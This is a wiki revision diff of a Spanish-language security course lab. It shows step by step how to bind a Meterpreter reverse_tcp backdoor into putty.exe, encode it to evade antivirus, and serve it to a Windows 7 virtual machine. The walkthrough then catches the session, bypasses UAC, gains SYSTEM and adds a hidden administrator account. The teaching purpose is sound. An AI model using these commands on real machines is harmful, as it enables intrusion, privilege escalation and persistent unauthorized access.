Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa Próxima revisión Ambos lados, revisión siguiente | ||
sad:t2:m3 [2018/11/21 18:38] José Manuel Guallar |
sad:t2:m3 [2019/01/04 13:18] 127.0.0.1 editor externo |
||
---|---|---|---|
Línea 59: | Línea 59: | ||
<code> | <code> | ||
- | cp putty.exe /usr/share/metasploit-framework/data/templates/ | + | cp putty.exe /usr/share/metasploit-framework/data/templates/ |
- | msfpayload windows/meterpreter/reverse_tcp LHOST=<ip_del_kali> LPORT=4444 R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/shikata_ga_nai -c 3 | + | msfpayload windows/meterpreter/reverse_tcp LHOST=<ip_del_kali> LPORT=4444 R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/shikata_ga_nai -c 3 |
- | chmod 744 /var/www/bad_putty.exe | + | chmod 744 /var/www/bad_putty.exe |
- | ls -lrta | grep putty | + | ls -lrta | grep putty |
</code> | </code> | ||
+ | |||
+ | El comando 1, ejecutables, como putty.exe, debe copiarse en el directorio /templates/ para codificarlo con msfencode. | ||
+ | |||
+ | El comando 2, crea una puerta trasera reverse_tcp usando msfpayload para conectarse nuevamente a Kali (LHOST = ip_kali) por el puerto (LPORT = 4444). Se usa msfencode para enlazar la puerta trasera en putty.exe. Se utilizan ce 3 interacciones de codificación shikata_ga_nai (No hay mas remedio) para evitar el antivirus de la máquina. | ||
+ | |||
+ | Comando 3, hace ejecutable bad_putty. | ||
+ | | ||
{{:sad:t2:m3:04.png?600|}} | {{:sad:t2:m3:04.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | script msfconsole_putty.txt | ||
+ | </code> | ||
+ | |||
+ | Hace un texto completo de la sesión terminal. Básicamente toda la entrada y la salida serán almacenadas en el archivo msfconsole_putty.txt. | ||
+ | |||
{{:sad:t2:m3:05.png?600|}} | {{:sad:t2:m3:05.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | msfconsole | ||
+ | </code> | ||
+ | |||
{{:sad:t2:m3:06.png?600|}} | {{:sad:t2:m3:06.png?600|}} | ||
+ | <code> | ||
+ | use exploit/multi/handler | ||
+ | set PAYLOAD windows/meterpreter/reverse_tcp | ||
+ | set LHOST <ip_del_kali> | ||
+ | set LPORT 4444 | ||
+ | exploit | ||
+ | </code> | ||
{{:sad:t2:m3:07.png?600|}} | {{:sad:t2:m3:07.png?600|}} | ||
+ | |||
+ | Vamos al Windows 7, abrimos un explorador y escribimos la ip del kali | ||
+ | |||
+ | <code> | ||
+ | http://ip_del_Kali/bad_putty.exe | ||
+ | </code> | ||
+ | |||
+ | |||
{{:sad:t2:m3:08.png?600|}} | {{:sad:t2:m3:08.png?600|}} | ||
+ | |||
+ | Ejecutamos el bad_putty | ||
+ | |||
{{:sad:t2:m3:09.png?600|}} | {{:sad:t2:m3:09.png?600|}} | ||
+ | Volvemos a la maquina virtual del Kali y se observa que el Meterpreter se ha actiado entre el Kali y el Windows vulnerable | ||
+ | |||
{{:sad:t2:m3:10.png?600|}} | {{:sad:t2:m3:10.png?600|}} | ||
+ | |||
+ | |||
+ | |||
+ | |||
{{:sad:t2:m3:11.png?600|}} | {{:sad:t2:m3:11.png?600|}} | ||
+ | <code> | ||
+ | sysinfo | ||
+ | </code> | ||
+ | |||
+ | |||
{{:sad:t2:m3:12.png?600|}} | {{:sad:t2:m3:12.png?600|}} | ||
+ | para saber el nombre de usuario escribimos | ||
+ | <code> | ||
+ | getuid | ||
+ | </code> | ||
{{:sad:t2:m3:13.png?600|}} | {{:sad:t2:m3:13.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | shell | ||
+ | echo %username% | ||
+ | </code> | ||
+ | |||
{{:sad:t2:m3:14.png?600|}} | {{:sad:t2:m3:14.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | net users | ||
+ | </code> | ||
+ | |||
{{:sad:t2:m3:15.png?600|}} | {{:sad:t2:m3:15.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | net users student | ||
+ | </code> | ||
+ | Para poder ver con detalle la cuenta estudiante. se observa que es parte del grupo de administradores | ||
+ | |||
{{:sad:t2:m3:16.png?600|}} | {{:sad:t2:m3:16.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | net users nombre_hacker abc123 /ADD /FULLNAME:"Tu nombre" | ||
+ | Observamos que nos pone Access denied. | ||
+ | exit | ||
+ | </code> | ||
+ | |||
{{:sad:t2:m3:17.png?600|}} | {{:sad:t2:m3:17.png?600|}} | ||
+ | <code> | ||
+ | background | ||
+ | sessions -l | ||
+ | </code> | ||
+ | comando 1 volvemos a la consola de Metasploit sin terminar la sesión | ||
+ | |||
+ | comando 2 podemos ver todas las sesiones establecidas. Es un l de leon | ||
+ | |||
{{:sad:t2:m3:18.png?600|}} | {{:sad:t2:m3:18.png?600|}} | ||
+ | <code> | ||
+ | use exploit/windows/local/bypassuac | ||
+ | show options | ||
+ | set SESSION 1 | ||
+ | "1" es el numero 1. | ||
+ | exploit | ||
+ | </code> | ||
+ | |||
+ | comando 1 es un modulo de post-explosión que incrementa el control de la cuenta de usuario | ||
+ | |||
{{:sad:t2:m3:19.png?600|}} | {{:sad:t2:m3:19.png?600|}} | ||
+ | |||
+ | |||
+ | |||
{{:sad:t2:m3:20.png?600|}} | {{:sad:t2:m3:20.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | getuid | ||
+ | getsystem | ||
+ | getuid | ||
+ | </code> | ||
+ | |||
+ | comando 1 proporciona el nombre de usuario "estudiante" | ||
+ | |||
+ | comando 2 permite poner la cuenta de usuario como cuenta de administrador | ||
+ | |||
+ | comando 3 el usuario ya es administrador privilegiado | ||
+ | |||
{{:sad:t2:m3:21.png?600|}} | {{:sad:t2:m3:21.png?600|}} | ||
+ | |||
+ | <code> | ||
+ | shell | ||
+ | net users nombre_hacker abc123 /ADD /FULLNAME:"YOUR NAME" | ||
+ | reemplaza nombre_hacker por tu nombre | ||
+ | net localgroup Administrators nombre_hacker /ADD | ||
+ | net localgroup Administrators | ||
+ | </code> | ||
+ | |||
+ | Se crea nombre_hacker con su contraseña | ||
+ | Muestra que usuarios pertenecen al grupo de Administradores. hombre_hacker pertenece ahora al grupo | ||
+ | |||
{{:sad:t2:m3:22.png?600|}} | {{:sad:t2:m3:22.png?600|}} | ||
+ | |||
+ | Se sale del Meterpreter al sistema | ||
+ | |||
{{:sad:t2:m3:23.png?600|}} | {{:sad:t2:m3:23.png?600|}} | ||
+ | <code> | ||
+ | net users nombre_hacker | ||
+ | </code> | ||
+ | |||
+ | Muestra los detalles de nombre_hacker | ||
{{:sad:t2:m3:24.png?600|}} | {{:sad:t2:m3:24.png?600|}} | ||
{{:sad:t2:m3:25.png?600|}} | {{:sad:t2:m3:25.png?600|}} | ||
+ | |||
+ | Establecemos una sesión remota con el Windows 7 | ||
+ | |||
{{:sad:t2:m3:26.png?600|}} | {{:sad:t2:m3:26.png?600|}} | ||
+ | <code> | ||
+ | cd /var/www | ||
+ | strings msfconsole_putty.txt | grep "Meterpreter session 2" | ||
+ | strings msfconsole_putty.txt | grep "Full Name" | ||
+ | date | ||
+ | echo "tu nombre" | ||
+ | </code> |